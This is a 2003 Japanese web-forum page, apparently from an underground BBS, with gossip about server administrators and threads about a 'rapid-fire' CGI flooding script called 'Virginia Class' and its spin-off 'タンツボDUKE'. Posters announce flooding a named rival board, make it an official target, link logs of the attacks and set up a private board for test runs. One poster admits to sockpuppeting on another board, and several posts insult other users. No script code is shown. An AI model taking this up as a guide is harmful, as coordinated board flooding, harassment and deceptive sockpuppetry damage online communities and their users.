クポッ!氏はug.toを盾にし暴言振舞、ゆかり氏はオフレコメール晒しでug.toを追い出された以外、
亀蔵氏となった現ug.toはSEY氏のug.toと変わった点は無いと推定されます。
これはStorm氏のStormサイト、ug.toの多くのサイトが現存していることを見ても明らか。
つまり見せかけの鯖管変更をしただけと。
Storm氏はSEY氏の電話の呼び掛けに応じて彼の言いなりになったことで現Stormサイトが継続されるわけですな(藁

クポッ!氏はug.to同様の鯖かそれ以上の鯖が見出せない、倒幕気運に対抗する気力が持てない現状。
復帰しないのはそんな所でしょう(藁
-------------------------------------------------

名前    Link   

削除パス (8文字以内の半角英数字)/ Mode
●記事選択→削除パス入力→Mode選択→実行で記事の訂正や削除が可能。

■ 「Virginia Class」完成まで待てない!スレ
[1] 暗黒元帥 at 2003/03/04 Tue 18:34:04  /* Master */
連射CGIスクリプト「Virginia Class」の基本骨子はすでに開発終了し、
現在は皆様が使い易くなるように諸改造&バグ取りしている最中なのですが、
デモンストレーションも兼ねて機能を小出し(形を変えての公開)にして行きたいと思います。

まずは「Virginia Class」のほんの一部の機能にしか過ぎないのですが
「タンツボDUKE」として新兵器を装ってお目見えさせました。
▼「タンツボDUKE」射撃跡
http://www.ultimo.to/fortress/archives/vc/030304_1758tantsubo.html

公開用には鉄に同じログをうpしたので、何かあったらそちらのURLを御利用下さい。
http://ime.nu/www.hellplant.org/cgi-bin/database/embryonic/xx0587.htm (check)

デモンストレーションには無差別荒らしサイト「新戦組」の板を使いました(ワラ
http://ime.nu/bbs1.cgiboy.com/kagerou001/ (check)
ここは上級厨房が所属しているので、以後公式ターゲットにしたいと思います。
ちなみにここを潰そうとして結成された「新撰組討伐軍」(たかタソ等在籍)には
獄龍鬼神氏が昨日から板を貸し始めました(w
http://www.ultimo.to/kisin/kbbs/bbs.cgi

↑のAvogadroの正体は私です。(もちろん内密にね(ワラ)
http://www.ultimo.to/kisin/kbbs/bbs.cgi#0304173838
[2] 影骸 at 2003/03/04 Tue 20:55:10  /* ID:8idOMDew */
異様な香りが漂ってますね。いやはや怖い。
負荷のほう大丈夫です?鯖が飛びそうなスクリプトですな・・・
新撰組か…上級もいるようですし
暗黒DUKE(勝手にあだ名)やら新型ソース(2000対応、NT未確認。XP実験者募集)
…弱いもの虐め出来ません(藁
[3] G殺し@$2 at 2003/03/06 Thu 22:33:03  /* ID:uczNmW12 */
あ〜くっそぉぉぉ…ひでぇ目にあったぜ…(;´Д`)
毎度(プの、HDD総あぼーん。破損クラスタ31500個…(逝
幸い、作りかけのヴァージニアAA、軍艦のサンプル画像一式はフォーマット前に
保管しましたのでご安心ください。今やっとセットアップの最終段階です。
11月に焼いた復旧CD-R、あれタイムスタンプの不整合エラーで
使えなかったんですよ…(;´Д`)
[4] G殺し@$2 at 2003/03/06 Thu 22:43:28  /* ID:uczNmW12 */
タンツボ上級がいっそう暴れてますね(ワラ
俺はHDDアボーンで、身動き取れなかったっての(ゲラップ

私のほうでも、今回のセットアップ中に練っておいた、
新構想“テポドンMk.弐(ツー)”の大綱をまとめました。
近日中に発表いたします。また、これにより武器庫のほうは
本日付を持って閉鎖させていただきました。
リンクおよびブックマークの削除をお願いいたします。

>影殿
>フル画面時にでるメッセージ用AAを作成してくださると嬉しいかも(笑)
了解しました。こちらは元帥殿のヴァージニア艦と対照的に、
ギャグ全開で逝かせて頂きます(ゲラ

(message was edited at 2003/03/07 Fri 13:10:17)
[5] 暗黒元帥 at 2003/03/23 Sun 01:01:09  /* Master */
こんな投稿を海援隊BBSにして来ました。
「タンツボDUKE」は「Virginia Class」のほんの一機能にしか過ぎません(w

http://www.ultimo.to/kisin/kbbs/bbs.cgi#0323005408

━━━━━━━━━━━━━━━━━━━━━━━
■ Avogadro後方支援 2
[1] [NEW!]Avogadro [ ID:6NwskyD5 ] at 2003/03/23 Sun 00:54:08

タンツボDUKE撃っといた。
「ペッ」の数がランダムに変化するのもポイントな(藁

・現場
http://ime.nu/bbs1.cgiboy.com/kagerou001/ (check)
・標本
http://ime.nu/www.hellplant.org/cgi-bin/database/embryonic/xx0626.htm (check)


なんとかDUKEと一緒にするなよ?(ワラ>k3
━━━━━━━━━━━━━━━━━━━━━━━
[6] G殺し@$2 at 2003/03/23 Sun 22:31:05  /* ID:uczNmW12 */
>元帥殿:
タソツヴォDUKE拝見しました。
折角ですので、私からもひとつ希望を(ワラ

(゜Д) ⌒゜ペッペッペッ>くそヴォケヘタレチンカスタンツボ上級厨房
の行を、スクリプトに追加おながいします(ゲラ

名前    Link   

削除パス (8文字以内の半角英数字)/ Mode
●記事選択→削除パス入力→Mode選択→実行で記事の訂正や削除が可能。

■ 暗黒・帝国軍共用極秘試験射撃場…完成!!
[1] G殺し@$2 at 2003/03/01 Sat 18:18:19  /* ID:uczNmW12 */
暗黒軍・帝国軍の各幕僚のみが使用できる試験射撃場を設けました。
http://ime.nu/f8.aaacafe.ne.jp/~bayonet/pbbs/p-bbsa.php? (check)
(リンクには“?”も入れてください)

このよう施設は、他の勢力には存在しません。
ログを参照して、射撃結果を参照することも出来ます。
さぁ、ガンガン撃ちまくれ!!!
[2] 暗黒元帥 at 2003/03/02 Sun 09:50:53  /* Master */
いいっすねー。
お疲れ様です(w
後日テスト爆撃させていただきます。
あくまでも軍事演習なので控え目に行くかとは思いますが(藁
[3] 暗黒元帥 at 2003/03/02 Sun 09:59:32  /* Master */
上部リンクにも加えました。

名前    Link   

削除パス (8文字以内の半角英数字)/ Mode
●記事選択→削除パス入力→Mode選択→実行で記事の訂正や削除が可能。


■ 新規スレッド作成
名前    Link
題名  

削除パス(8文字以内の半角英数字)

●フォームの入力欄は全て入力必須項目です。
●「削除パス」は認識IDを生成し記事の削除と訂正を可能にします。
●タグ使用不可。

MENU for ADMINISTRATORS
Mode :   Pass :   2nd Pass : 


Powered by Force 264 v3.23A & iMac零式 v3.23A改-2.0 Arranged by あじ v0.06
More Powered by 暗黒元帥 v2.96